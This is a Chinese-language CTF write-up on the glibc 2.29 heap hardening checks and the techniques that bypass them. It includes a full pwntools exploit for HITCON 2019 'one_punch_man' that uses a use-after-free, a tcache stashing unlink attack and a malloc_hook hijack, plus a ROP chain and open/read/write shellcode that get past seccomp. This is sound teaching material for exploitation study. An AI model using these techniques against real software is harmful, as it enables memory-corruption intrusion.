新增保护机制

tcache

tcache_entry结构体新增了一个指针key存放在chunk的bk处，tache_put写入，tcache_get清空

tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache;

  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  e->key = NULL;
  return (void *) e;
}

在free一个tcache时，新增一个判断分支：如果bk==key则会遍历tcache检查是否有相同的chunk

#if USE_TCACHE
  {
    size_t tc_idx = csize2tidx (size);
    if (tcache != NULL && tc_idx < mp_.tcache_bins)
      {
	/* Check to see if it's already in the tcache.  */
	tcache_entry *e = (tcache_entry *) chunk2mem (p);

	/* This test succeeds on double free.  However, we don't 100%
	   trust it (it also matches random payload data at a 1 in
	   2^<size_t> chance), so verify it's not an unlikely
	   coincidence before aborting.  */
	if (__glibc_unlikely (e->key == tcache))
	  {
	    tcache_entry *tmp;
	    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
	    for (tmp = tcache->entries[tc_idx];
		 tmp;
		 tmp = tmp->next)
	      if (tmp == e)
		malloc_printerr ("free(): double free detected in tcache 2");
	    /* If we get here, it was a coincidence.  We've wasted a
	       few cycles, but don't abort.  */
	  }

	if (tcache->counts[tc_idx] < mp_.tcache_count)
	  {
	    tcache_put (p, tc_idx);
	    return;
	  }
      }
  }
#endif

如何绕过呢？？

修改bk使不进入循环分支
修改size从而修改tc_idx
house of botcake：合并chunk1 chunk2进unsortedbins，将chunk2链进tcache，从chunk1分配一个大chunk造成overlapped到chunk2修改其fd
fastbin_reverse_into_tcache

unsortedbins

新增检查

size是否合理
next chunk的prev_size是否等于victim的size
双向链表完整性检查
next chunk的prev_inuse位是否为0

if (__glibc_unlikely (size <= 2 * SIZE_SZ)
              || __glibc_unlikely (size > av->system_mem))
            malloc_printerr ("malloc(): invalid size (unsorted)");
          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
          if (__glibc_unlikely (bck->fd != victim)
              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
            malloc_printerr ("malloc(): unsorted double linked list corrupted");
          if (__glibc_unlikely (prev_inuse (next)))
            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");

malloc overlap

当向后合并（低地址）时，会检查上个chunk的size和当前chunk的prev_size是否相等

/* consolidate backward */
    if (!prev_inuse(p)) {
      prevsize = prev_size (p);
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      if (__glibc_unlikely (chunksize(p) != prevsize))
        malloc_printerr ("corrupted size vs. prev_size while consolidating");
      unlink_chunk (av, p);
    }

以下假设有off by null漏洞👇

在之前的glibc版本中还存在双向链表检查，我们一般是通过将要合并的chunk放入unsortedbins中获得系统给的fd和bk来绕过以达到chunk overlapping的目的。但是2.29的新机制无法通过这个方式绕过双向链表检查。

如何绕过呢？？？

主要思路是利用从largebin中分配的残留指针 fd_nextsize / bk_nextsize，因为largebin中只有一个chunk时，这两个指针指向自己，先通过部分覆盖修改fb_nextsize的第一个字节，使其指向一个我们可以控制bk的chunk，例如利用smallbins或unsortedbins的机制部分覆盖bk指向fake_chunk。这时bk_nextsize仍然指向自己。利用同样的思路将其链入fastbins中部分覆盖第一个字节使其指向fake_chunk。这样双向链表就构造好了

总结一下就是利用smallbins会在bk写入堆地址，fastbins会在fd写入堆地址，然后部分覆盖构造双向链表。但是我们无法保证堆地址第二个字节是\x00，所以这种攻击方式有6.25%的概率会成功:]

top chunk

1 2	if (__glibc_unlikely (size > av->system_mem)) malloc_printerr ("malloc(): corrupted top size");

Hitcon-CTF2019-one_punch_man

保护全开

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

程序有5个功能:

add

unsigned __int64 __fastcall Add(__int64 a1, __int64 a2)
{
  unsigned int idx; // [rsp+8h] [rbp-418h]
  signed int name_len; // [rsp+Ch] [rbp-414h]
  char s[1032]; // [rsp+10h] [rbp-410h]
  unsigned __int64 v6; // [rsp+418h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  MyPuts("idx: ");
  idx = read_int();
  if ( idx > 2 )
    error((__int64)"invalid");
  MyPuts("hero name: ");
  memset(s, 0, 1024uLL);
  name_len = read(0, s, 0x400uLL);
  if ( name_len <= 0 )
    error((__int64)"io");
  s[name_len - 1] = 0;
  if ( name_len <= 0x7F || name_len > 0x400 )
    error((__int64)"poor hero name");
  *((_QWORD *)&unk_4040 + 2 * idx) = calloc(1uLL, name_len);
  qword_4048[2 * idx] = name_len;
  strncpy(*((char **)&unk_4040 + 2 * idx), s, name_len);
  memset(s, 0, 0x400uLL);
  return __readfsqword(0x28u) ^ v6;
}

在这个函数里允许我们分配0x80-0x400大小的chunk，并把初始化chunk的内容先保存在栈上再通过strncpy传送到堆里，rebase(0x4040)会依次保存chunk地址和大小且只能同时分配三个。注意这里分配chunk使用的是calloc，即不会从tcache中取chunk。

free

void __fastcall Delete(__int64 a1, __int64 a2)
{
  unsigned int v2; // [rsp+Ch] [rbp-4h]

  MyPuts("idx: ");
  v2 = read_int();
  if ( v2 > 2 )
    error((__int64)"invalid");
  free(*((void **)&unk_4040 + 2 * v2));         // uaf
}

这里没有对指针清空，存在uaf

backdoor

ssize_t __fastcall Magic(__int64 a1, __int64 a2)
{
  void *buf; // [rsp+8h] [rbp-8h]

  if ( *(_BYTE *)(qword_4030 + 0x20) <= 6 )
    error((__int64)"gg");
  buf = malloc(0x217uLL);
  if ( !buf )
    error((__int64)"err");
  if ( read(0, buf, 0x217uLL) <= 0 )
    error((__int64)"io");
  puts("Serious Punch!!!");
  puts((const char *)&unk_2128);
  return puts((const char *)buf);
}

程序留了一个后门函数可以调用malloc，限制了利用条件 *(heap_base+0x30) > 6

edit

ssize_t __fastcall rename(__int64 a1, __int64 a2)
{
  ssize_t result; // rax
  unsigned int v3; // [rsp+Ch] [rbp-4h]

  MyPuts("idx: ");
  v3 = read_int();
  if ( v3 > 2 )
    error((__int64)"invalid");
  if ( !*((_QWORD *)&unk_4040 + 2 * v3) )
    error((__int64)"err");
  MyPuts("hero name: ");
  result = read(0, *((void **)&unk_4040 + 2 * v3), qword_4048[2 * v3]);
  if ( result <= 0 )
    error((__int64)"io");
  return result;
}

show

ssize_t __fastcall Show(__int64 a1, __int64 a2)
{
  ssize_t result; // rax
  unsigned int v3; // [rsp+Ch] [rbp-4h]

  MyPuts("idx: ");
  v3 = read_int();
  if ( v3 > 2 )
    error((__int64)"invalid");
  result = *((_QWORD *)&unk_4040 + 2 * v3);
  if ( result )
  {
    MyPuts("hero name: ");
    result = puts(*((const char **)&unk_4040 + 2 * v3));
  }
  return result;
}

因为存在uaf，所以我们可以很容易地leak出堆地址和libc地址，同时存在edit函数可以修改tcache的fd，只要可以调用程序留给我们的后门函数中的malloc就可以实现任意地址写

那么如何将heap_base+0x30处的值修改为一个large value呢

这里就要用到glibc2.29下的一种利用手法tcache_stashing_unlink_attack

先贴主要用到的glibc源码

if (in_smallbin_range (nb))
    {
      idx = smallbin_index (nb);
      bin = bin_at (av, idx);

      if ((victim = last (bin)) != bin)
        {
          bck = victim->bk;
	  if (__glibc_unlikely (bck->fd != victim))
	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
          set_inuse_bit_at_offset (victim, nb);
          bin->bk = bck;
          bck->fd = bin;

          if (av != &main_arena)
	    set_non_main_arena (victim);
          check_malloced_chunk (av, victim, nb);
#if USE_TCACHE
	  /* While we're here, if we see other chunks of the same size,
	     stash them in the tcache.  */
	  size_t tc_idx = csize2tidx (nb);
	  if (tcache && tc_idx < mp_.tcache_bins)
	    {
	      mchunkptr tc_victim;

	      /* While bin not empty and tcache not full, copy chunks over.  */
	      while (tcache->counts[tc_idx] < mp_.tcache_count
		     && (tc_victim = last (bin)) != bin)
		{
		  if (tc_victim != 0)
		    {
		      bck = tc_victim->bk;
		      set_inuse_bit_at_offset (tc_victim, nb);
		      if (av != &main_arena)
			set_non_main_arena (tc_victim);
		      bin->bk = bck;
		      bck->fd = bin;

		      tcache_put (tc_victim, tc_idx);
	            }
		}
	    }
#endif

因为我们无法像how2heap中修改fake_chunk->fd为一个可写的地址，所以我们只在tcache中预留一个位置

那么如何使得smallbins存在两个chunk并且相应大小的tcache未满呢？？

这里用到一个技巧，通过分配并释放一个较大的chunk，然后利用分割机制拿到我们想要的size

add(0,"aaaa",0x210)
add(2,"tcache",0x210)
free(2)#fill tcache done
add(1,"bbbb",0x210)
·
·
·
free(0)
add(2,"cccc",0x180)
free(1)
add(2,"dddd",0x180)
add(2,"cccc",0xa0)#malloc_consolidate

此时的堆布局：

pwndbg> bins
tcachebins
0x90 [  6]: 0x564cf556c850 —▸ 0x564cf556c7c0 —▸ 0x564cf556c730 —▸ 0x564cf556c6a0 —▸ 0x564cf556c610 —▸ 0x564cf556c580 ◂— 0x0
0x220 [  7]: 0x564cf556c140 —▸ 0x7f1d7731dc30 (__malloc_hook) ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0x90: 0x564cf556c4e0 —▸ 0x564cf556c0a0 —▸ 0x7f1d7731dd20 (main_arena+224) ◂— 0x564cf556c4e0
largebins
empty
pwndbg> x/2gx 0x564cf556c4e0
0x564cf556c4e0:	0x0000000000000000	0x0000000000000091
pwndbg> x/2gx 0x564cf556c0a0
0x564cf556c0a0:	0x0000000000000000	0x0000000000000091

然后修改chunk1的bk为heap_base+0x20，再分配一个相应大小的chunk触发攻击

chunk1会链入相应的tcache，heap_base+0x20处的fake_chunk会被当成bck，并会将smallbin赋值给其fd

pwndbg> x/10gx 0x564cf556b000
0x564cf556b000:	0x0000000000000000	0x0000000000000251
0x564cf556b010:	0x0700000000000000	0x0000000000000000
0x564cf556b020:	0x0000000000000000	0x0000000000000000
0x564cf556b030:	0x00007f1d7731dd20	0x0000000000000000
0x564cf556b040:	0x0000000000000000	0x0000000000000000
pwndbg> x/4gx 0x00007f1d7731dd20
0x7f1d7731dd20 <main_arena+224>:	0x00007f1d7731dd10	0x00007f1d7731dd10
0x7f1d7731dd30 <main_arena+240>:	0x0000564cf556c4e0	0x0000564cf556b020

此时tache已经被我们打烂了。。至于怎么烂的我也不知道。。还好我们之前已经修改了fd，这时直接调用malloc就可以劫持malloc_hook

pwndbg> bins
tcachebins
0x90 [  7]: 0x564cf556c4f0 —▸ 0x564cf556c850 —▸ 0x564cf556c7c0 —▸ 0x564cf556c730 —▸ 0x564cf556c6a0 —▸ 0x564cf556c610 —▸ 0x564cf556c580 ◂— 0x0
0x220 [ 32]: 0x564cf556c140 —▸ 0x7f1d7731dc30 (__malloc_hook) ◂— 0x0
0x230 [-35]: 0x0
0x240 [ 49]: 0x0
0x250 [119]: 0x0
0x260 [ 29]: 0x0
0x270 [127]: 0x0

因为这题使用 seccomp 开启了沙箱保护，只有白名单上的系统调用可以使用。

# seccomp-tools dump ./one_punch
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x01 0x00 0xc000003e  if (A == ARCH_X86_64) goto 0003
 0002: 0x06 0x00 0x00 0x00000000  return KILL
 0003: 0x20 0x00 0x00 0x00000000  A = sys_number
 0004: 0x15 0x00 0x01 0x0000000f  if (A != rt_sigreturn) goto 0006
 0005: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0006: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0008
 0007: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0008: 0x15 0x00 0x01 0x0000003c  if (A != exit) goto 0010
 0009: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0010: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0012
 0011: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0012: 0x15 0x00 0x01 0x00000000  if (A != read) goto 0014
 0013: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0014: 0x15 0x00 0x01 0x00000001  if (A != write) goto 0016
 0015: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0016: 0x15 0x00 0x01 0x0000000c  if (A != brk) goto 0018
 0017: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0018: 0x15 0x00 0x01 0x00000009  if (A != mmap) goto 0020
 0019: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0020: 0x15 0x00 0x01 0x0000000a  if (A != mprotect) goto 0022
 0021: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0022: 0x15 0x00 0x01 0x00000003  if (A != close) goto 0024
 0023: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0024: 0x06 0x00 0x00 0x00000000  return KILL

我们无法执行execve系统调用，只能用过orw（open/read/write）来读取flag

因为调用add函数时，程序先将我们的输入放在了栈上，所以考虑在此处构造rop

pwndbg> stack 20
00:0000│ rsp  0x7ffd2f88c210 —▸ 0x7f570f3814c0 (_dl_tunable_set_mallopt_check) ◂— mov    eax, dword ptr [rdi]
01:0008│      0x7ffd2f88c218 ◂— 0x10100000002
02:0010│ rsi  0x7ffd2f88c220 —▸ 0x7f570f3229a0 (init_cacheinfo+240) ◂— pop    rdi
03:0018│      0x7ffd2f88c228 —▸ 0x564a8ba4e000 ◂— 0x0
04:0020│      0x7ffd2f88c230 —▸ 0x7f570f3253a5 (insert_module+85) ◂— pop    rsi
05:0028│      0x7ffd2f88c238 ◂— 0x10000
06:0030│      0x7ffd2f88c240 —▸ 0x7f570f302b9a ◂— pop    rdx
07:0038│      0x7ffd2f88c248 ◂— 0x7
08:0040│      0x7ffd2f88c250 —▸ 0x7f570f3ee370 (mprotect) ◂— mov    eax, 0xa
09:0048│      0x7ffd2f88c258 —▸ 0x564a8ba4f990 ◂— 0x3148c03148e78948
0a:0050│      0x7ffd2f88c260 ◂— 0x67616c66 /* 'flag' */
0b:0058│      0x7ffd2f88c268 ◂— 0x0
... ↓

在调用calloc里有一系列抬高栈顶的操作，将malloc_hook改为add rsp,48h;ret就可以执行我们构造的rop

完整exp

from pwn_debug import*
pdb = pwn_debug("./one_punch")
pdb.debug('2.29')
p = pdb.run("debug")

#context.log_level = "debug"
libc = ELF("/glibc/x64/2.29/lib/libc-2.29.so")
one_gadget = [0xc1720,0xdf212,0xdf21e]

def add(index,content,size):
    p.sendlineafter("> ","1")
    p.sendlineafter("idx: ",str(index))
    p.sendlineafter("name: ",content.ljust(size,'\x00'))

def edit(index,content):
    p.sendlineafter("> ","2")
    p.sendlineafter("idx: ",str(index))
    p.sendlineafter("name: ",content)

def show(index):
    p.sendlineafter("> ","3")
    p.sendlineafter("idx: ",str(index))

def free(index):
    p.sendlineafter("> ","4")
    p.sendafter("idx: ",str(index))

def malloc(content):
    p.sendlineafter("> ","50056")
    p.sendline(content)

def g():
    gdb.attach(p,"b *$rebase(0x1235)")

for i in range(6):
    add(0,"aaaa",0x210)
    free(0)
show(0)
heap_leak = u64(p.recvuntil('\n',drop=True)[-6:].ljust(8,'\x00'))
heap_base = heap_leak - 0x4e0 - 0x5c0 - 0x40
info("heap_base:" + hex(heap_base))
add(0,"aaaa",0x210)
add(2,"tcache",0x210)
free(2)#fill tcache done
add(1,"bbbb",0x210)

free(0)
show(0)
libc_leak = u64(p.recvuntil('\n',drop=True)[-6:].ljust(8,'\x00'))
libc.address = libc_leak - 0x3b3ca0
info("libc_base:" + hex(libc.address))

edit(2,p64(libc.sym['__malloc_hook']))#change fd

add(0,"aaaa",0x210)

for i in range(6):
    add(2,"aaaa",0x80)
    free(2)
free(0)
add(2,"cccc",0x180)
free(1)
add(2,"dddd",0x180)
add(2,"cccc",0xa0)
edit(1,"a"*0x180+p64(0)+p64(0x91)+p64(heap_base+0x10a0) + p64(heap_base + 0x20))
add(2,"eeee",0x80)

pop_rdi = libc.address + 0x219a0
pop_rsi = libc.address + 0x243a5
pop_rdx = libc.address + 0x1b9a
mprotect = libc.sym['mprotect']

rop = flat(
	pop_rdi,
	heap_base,
	pop_rsi,
	0x10000,
	pop_rdx,
	7,
	mprotect,
	heap_base+0x1990
)
sc = asm(
	'''
	mov rdi, rsp;
	xor rax, rax;
	xor rsi, rsi;
	mov al, 2;
	syscall;

	mov rsi, rdi;
	mov rdi, rax;
	mov dx, 0x123;
	xor rax, rax;
	syscall;
	
	xor rdi,rdi;
	add rdi, 1;
	xor rax, rax;
	mov al, 1;
	syscall;
	'''
)
add(0,sc,0x100)#orw

malloc("cccc")
g()
malloc("ff"+p64(libc.address+0xbe131))#add rsp,0x48;ret

add(2,(rop+"flag\x00"),0x400)

p.interactive()

reference

https://bbs.pediy.com/thread-257901.htm

http://blog.eonew.cn/archives/1233